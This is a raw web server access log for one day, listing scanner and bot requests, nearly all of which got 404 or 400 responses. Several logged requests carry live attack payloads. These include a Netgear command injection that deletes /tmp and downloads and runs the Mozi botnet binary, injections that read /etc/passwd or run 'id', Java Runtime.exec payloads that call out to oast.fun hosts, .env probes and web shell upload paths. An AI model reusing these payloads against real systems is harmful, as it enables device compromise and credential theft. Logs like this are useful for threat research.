45.95.147.173 - - [09/Sep/2025:00:06:53 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.135.193.253 - - [09/Sep/2025:00:19:06 +0200] "GET / HTTP/1.1" 200 1895 185.169.4.150 - - [09/Sep/2025:00:19:20 +0200] "GET / HTTP/1.1" 200 1895 18.97.5.37 - - [09/Sep/2025:00:22:02 +0200] "GET / HTTP/1.1" 200 1895 45.9.168.192 - - [09/Sep/2025:00:22:36 +0200] "-" 400 1930 45.9.168.192 - - [09/Sep/2025:00:22:36 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 205.185.127.70 - - [09/Sep/2025:00:45:43 +0200] "GET /.env68 HTTP/1.1" 404 724 172.174.234.168 - - [09/Sep/2025:01:08:28 +0200] "-" 400 1930 20.127.224.63 - - [09/Sep/2025:01:59:02 +0200] "GET / HTTP/1.1" 200 1895 172.236.228.198 - - [09/Sep/2025:02:25:40 +0200] "GET / HTTP/1.1" 200 1895 196.251.87.42 - - [09/Sep/2025:02:38:54 +0200] "-" 400 1930 196.251.89.45 - - [09/Sep/2025:02:48:38 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 205.210.31.101 - - [09/Sep/2025:02:58:37 +0200] "GET / HTTP/1.0" 200 1895 64.62.197.107 - - [09/Sep/2025:03:03:44 +0200] "-" 400 1930 205.185.127.70 - - [09/Sep/2025:03:14:25 +0200] "GET /.env67 HTTP/1.1" 404 724 45.135.193.253 - - [09/Sep/2025:03:18:50 +0200] "GET / HTTP/1.1" 200 1895 186.235.248.95 - - [09/Sep/2025:03:34:43 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.17 - - [09/Sep/2025:04:57:18 +0200] "CONNECT api.my-ip.io:443 HTTP/1.1" 400 804 195.184.76.124 - - [09/Sep/2025:05:37:55 +0200] "-" 400 1930 195.184.76.102 - - [09/Sep/2025:05:37:58 +0200] "GET / HTTP/1.1" 200 1895 205.185.127.70 - - [09/Sep/2025:05:44:31 +0200] "GET /.env63 HTTP/1.1" 404 724 195.184.76.246 - - [09/Sep/2025:05:53:15 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.135.193.253 - - [09/Sep/2025:06:03:11 +0200] "GET / HTTP/1.1" 200 1895 178.22.24.23 - - [09/Sep/2025:06:08:12 +0200] "-" 400 1930 178.22.24.23 - - [09/Sep/2025:06:08:13 +0200] "-" 400 1930 91.196.152.208 - - [09/Sep/2025:06:40:34 +0200] "-" 400 1930 91.196.152.212 - - [09/Sep/2025:06:40:37 +0200] "GET / HTTP/1.1" 200 1895 223.68.130.6 - - [09/Sep/2025:06:42:10 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://223.68.130.6:37753/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 91.231.89.146 - - [09/Sep/2025:06:48:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729 160.191.243.178 - - [09/Sep/2025:07:15:18 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 205.185.127.70 - - [09/Sep/2025:08:15:51 +0200] "GET /.env62 HTTP/1.1" 404 724 66.132.153.63 - - [09/Sep/2025:09:02:07 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.63 - - [09/Sep/2025:09:02:10 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.63 - - [09/Sep/2025:09:02:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.63 - - [09/Sep/2025:09:02:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.63 - - [09/Sep/2025:09:02:14 +0200] "GET /login HTTP/1.1" 404 723 91.148.240.190 - - [09/Sep/2025:09:14:41 +0200] "GET / HTTP/1.1" 200 1895 3.130.96.91 - - [09/Sep/2025:09:23:50 +0200] "GET / HTTP/1.1" 200 1895 3.130.96.91 - - [09/Sep/2025:09:25:46 +0200] "GET / HTTP/1.1" 200 1895 3.130.96.91 - - [09/Sep/2025:09:27:28 +0200] "-" 400 1930 3.130.96.91 - - [09/Sep/2025:09:28:59 +0200] "-" 400 1930 3.130.96.91 - - [09/Sep/2025:09:30:44 +0200] "-" 400 1930 178.238.236.27 - - [09/Sep/2025:09:39:55 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 771 147.185.132.138 - - [09/Sep/2025:09:51:14 +0200] "GET / HTTP/1.1" 200 1895 172.104.241.92 - - [09/Sep/2025:09:57:48 +0200] "GET / HTTP/1.0" 200 1895 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET / HTTP/1.1" 200 1895 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET / HTTP/1.1" 200 1895 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET /webui HTTP/1.1" 404 723 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET / HTTP/1.1" 200 1895 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET /owa/ HTTP/1.1" 404 726 172.104.241.92 - - [09/Sep/2025:09:57:54 +0200] "GET /owa/ HTTP/1.1" 404 726 172.104.241.92 - - [09/Sep/2025:09:58:04 +0200] "-" 400 1930 172.104.241.92 - - [09/Sep/2025:09:58:14 +0200] "GET / HTTP/1.0" 200 1895 172.104.241.92 - - [09/Sep/2025:09:58:14 +0200] "GET / HTTP/1.1" 200 1895 45.135.193.253 - - [09/Sep/2025:10:09:25 +0200] "GET / HTTP/1.1" 200 1895 176.65.149.157 - - [09/Sep/2025:10:33:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 44.220.185.214 - - [09/Sep/2025:10:38:39 +0200] "GET / HTTP/1.1" 200 1895 178.62.216.118 - - [09/Sep/2025:10:46:54 +0200] "GET /aaa9 HTTP/1.1" 404 722 178.62.216.118 - - [09/Sep/2025:10:46:54 +0200] "GET /aab8 HTTP/1.1" 404 722 178.62.216.118 - - [09/Sep/2025:10:46:56 +0200] "GET / HTTP/1.1" 200 1895 205.185.127.70 - - [09/Sep/2025:10:47:40 +0200] "GET /.env61 HTTP/1.1" 404 724 40.124.175.251 - - [09/Sep/2025:11:21:55 +0200] "GET /hudson HTTP/1.1" 404 724 52.90.96.152 - - [09/Sep/2025:11:48:10 +0200] "GET / HTTP/1.1" 200 1895 141.98.82.26 - - [09/Sep/2025:12:04:06 +0200] "POST / HTTP/1.1" 200 1895 141.98.82.26 - - [09/Sep/2025:12:04:14 +0200] "GET null HTTP/1.1" 400 1994 141.98.82.26 - - [09/Sep/2025:12:04:21 +0200] "GET /public/template.cgi?templatefile=$(id) HTTP/1.1" 404 741 141.98.82.26 - - [09/Sep/2025:12:04:23 +0200] "GET / HTTP/1.1" 200 1895 141.98.82.26 - - [09/Sep/2025:12:04:25 +0200] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 404 756 141.98.82.26 - - [09/Sep/2025:12:04:27 +0200] "POST /api/remote HTTP/1.1" 404 732 141.98.82.26 - - [09/Sep/2025:12:04:28 +0200] "POST /portal/loginpage.aspx HTTP/1.1" 404 743 141.98.82.26 - - [09/Sep/2025:12:04:37 +0200] "POST /login HTTP/1.1" 404 723 141.98.82.26 - - [09/Sep/2025:12:04:42 +0200] "POST /protocol.csp?x HTTP/1.1" 404 730 141.98.82.26 - - [09/Sep/2025:12:04:47 +0200] "GET null HTTP/1.1" 400 1994 141.98.82.26 - - [09/Sep/2025:12:04:50 +0200] "POST /api/v1/validate/code HTTP/1.1" 404 750 141.98.82.26 - - [09/Sep/2025:12:04:50 +0200] "GET /API/regionsDiscovery.php?master=spark%3A%2F%2Fd2vtvt6r7hl5a0bgtbbg8zkqs5ehd9xfu.oast.fun:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis®ions&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1" 404 746 94.45.110.20 - - [09/Sep/2025:12:48:14 +0200] "GET / HTTP/1.1" 400 771 196.251.117.173 - - [09/Sep/2025:13:02:38 +0200] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 804 205.185.127.70 - - [09/Sep/2025:13:17:59 +0200] "GET /.env60 HTTP/1.1" 404 724 141.98.82.26 - - [09/Sep/2025:13:23:23 +0200] "GET /images/index.html?id=%24%7B%40print_r%28%40system%28%22id%22%29%29%7D HTTP/1.1" 404 739 141.98.82.26 - - [09/Sep/2025:13:23:23 +0200] "GET /images/index.html?id=%24%7B%40print_r%28%40system%28%22cat+/etc/passwd%22%29%29%7D HTTP/1.1" 404 739 141.98.82.26 - - [09/Sep/2025:13:23:27 +0200] "POST /web/cgi-bin/usbinteract.cgi HTTP/1.1" 404 753 141.98.82.26 - - [09/Sep/2025:13:23:30 +0200] "POST /cgi-bin/usbinteract.cgi HTTP/1.1" 404 745 138.197.198.84 - - [09/Sep/2025:13:26:43 +0200] "-" 400 1930 138.197.198.84 - - [09/Sep/2025:13:26:44 +0200] "-" 400 1930 138.197.198.84 - - [09/Sep/2025:13:26:44 +0200] "GET / HTTP/1.1" 200 1895 138.197.198.84 - - [09/Sep/2025:13:26:44 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 138.197.198.84 - - [09/Sep/2025:13:26:44 +0200] "GET /get.php HTTP/1.1" 404 725 45.135.193.253 - - [09/Sep/2025:13:48:45 +0200] "GET / HTTP/1.1" 200 1895 141.98.82.26 - - [09/Sep/2025:14:01:34 +0200] "GET /login.php?authorized=eyJ1c2VyIjogeyJuYW1lIjogImFkbWluIiwgImxvZ2luIjogImFkbWluIn0sInJvbGUiOnsibmFtZSI6ImFkbWluaXN0cmF0b3IiLCAicmVzdHJpY3Rpb25zIjogW10sImRlbGV0ZWFibGUiOiBmYWxzZX19 HTTP/1.1" 404 727 141.98.82.26 - - [09/Sep/2025:14:01:38 +0200] "GET /v.1.5/php/features/feature-transfer-export.php?action=id;&filename&varid&slot HTTP/1.1" 404 776 141.98.82.26 - - [09/Sep/2025:14:01:41 +0200] "GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d2vtvt6r7hl5a0bgtbbgw19a6xk5k1iw9.oast.fun')%7d HTTP/1.1" 404 753 141.98.82.26 - - [09/Sep/2025:14:01:44 +0200] "GET /api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d2vtvt6r7hl5a0bgtbbgqw91yn8k5q8rs.oast.fun')%7d HTTP/1.1" 404 745 141.98.82.26 - - [09/Sep/2025:14:01:48 +0200] "GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=6654 HTTP/1.1" 404 748 141.98.82.26 - - [09/Sep/2025:14:01:52 +0200] "GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=6654 HTTP/1.1" 404 748 77.32.83.162 - - [09/Sep/2025:14:06:30 +0200] "GET / HTTP/1.0" 200 1895 207.244.238.24 - - [09/Sep/2025:14:25:04 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.122 - - [09/Sep/2025:14:43:16 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.131 - - [09/Sep/2025:14:43:46 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.128 - - [09/Sep/2025:14:44:03 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.130 - - [09/Sep/2025:14:44:14 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.197.122 - - [09/Sep/2025:14:44:32 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 216.180.246.119 - - [09/Sep/2025:14:46:50 +0200] "-" 400 1930 216.180.246.119 - - [09/Sep/2025:14:47:12 +0200] "GET / HTTP/1.1" 200 1895 216.180.246.119 - - [09/Sep/2025:14:50:37 +0200] "-" 400 1930 216.180.246.119 - - [09/Sep/2025:14:50:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 80.75.212.17 - - [09/Sep/2025:15:11:06 +0200] "CONNECT api.my-ip.io:443 HTTP/1.1" 400 804 141.98.82.26 - - [09/Sep/2025:15:19:45 +0200] "POST /menu.php HTTP/1.1" 404 726 141.98.82.26 - - [09/Sep/2025:15:19:46 +0200] "GET /cache_public/sh.phtml HTTP/1.1" 404 743 141.98.82.26 - - [09/Sep/2025:15:19:46 +0200] "GET /cache_public/sh.php HTTP/1.1" 404 741 141.98.82.26 - - [09/Sep/2025:15:20:05 +0200] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 404 786 141.98.82.26 - - [09/Sep/2025:15:20:05 +0200] "POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1" 404 784 141.98.82.26 - - [09/Sep/2025:15:20:06 +0200] "GET /wp-content/uploads/simple-file-list/fiabcge.php HTTP/1.1" 404 777 205.185.127.70 - - [09/Sep/2025:15:48:36 +0200] "GET /.env6 HTTP/1.1" 404 723 205.210.31.105 - - [09/Sep/2025:15:59:46 +0200] "GET / HTTP/1.1" 200 1895 5.200.72.26 - - [09/Sep/2025:16:13:31 +0200] "GET / HTTP/1.1" 200 1895 23.225.178.154 - - [09/Sep/2025:16:28:30 +0200] "GET / HTTP/1.0" 200 1895 202.136.243.129 - - [09/Sep/2025:17:30:52 +0200] "GET / HTTP/1.1" 200 1895 202.136.243.142 - - [09/Sep/2025:17:30:58 +0200] "GET / HTTP/1.1" 200 1895 202.136.243.142 - - [09/Sep/2025:17:30:59 +0200] "GET /docs/ HTTP/1.1" 404 727 98.80.4.49 - - [09/Sep/2025:18:00:22 +0200] "GET / HTTP/1.1" 200 1895 138.197.131.20 - - [09/Sep/2025:18:05:52 +0200] "-" 400 1930 176.65.132.50 - - [09/Sep/2025:18:13:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.187.178.139 - - [09/Sep/2025:18:19:08 +0200] "GET / HTTP/1.1" 200 1895 194.187.178.138 - - [09/Sep/2025:18:19:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.185.127.70 - - [09/Sep/2025:18:20:22 +0200] "GET /.env59 HTTP/1.1" 404 724 45.135.193.253 - - [09/Sep/2025:18:31:40 +0200] "GET / HTTP/1.1" 200 1895 174.138.51.203 - - [09/Sep/2025:19:05:51 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:51 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:52 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:52 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:52 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:52 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:52 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:53 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:53 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:53 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:53 +0200] "-" 400 1930 174.138.51.203 - - [09/Sep/2025:19:05:53 +0200] "-" 400 1930 91.238.181.92 - - [09/Sep/2025:19:17:27 +0200] "-" 400 1930 176.65.148.92 - - [09/Sep/2025:19:34:14 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 104.248.0.237 - - [09/Sep/2025:20:21:36 +0200] "-" 400 1930 104.248.0.237 - - [09/Sep/2025:20:21:36 +0200] "-" 400 1930 104.248.0.237 - - [09/Sep/2025:20:21:36 +0200] "GET / HTTP/1.1" 200 1895 104.248.0.237 - - [09/Sep/2025:20:21:36 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 104.248.0.237 - - [09/Sep/2025:20:21:36 +0200] "GET /get.php HTTP/1.1" 404 725 205.185.127.70 - - [09/Sep/2025:20:50:44 +0200] "GET /.env58 HTTP/1.1" 404 724 45.135.193.253 - - [09/Sep/2025:21:42:36 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.230 - - [09/Sep/2025:21:50:47 +0200] "GET / HTTP/1.0" 200 1895 205.210.31.250 - - [09/Sep/2025:21:55:12 +0200] "-" 400 1930 205.210.31.250 - - [09/Sep/2025:21:55:12 +0200] "-" 400 1930 196.251.89.45 - - [09/Sep/2025:22:04:52 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [09/Sep/2025:22:05:20 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [09/Sep/2025:22:05:21 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.95.147.173 - - [09/Sep/2025:22:27:06 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 89.248.168.227 - - [09/Sep/2025:23:09:00 +0200] "GET / HTTP/1.1" 200 1895 205.185.127.70 - - [09/Sep/2025:23:20:16 +0200] "GET /.env57 HTTP/1.1" 404 724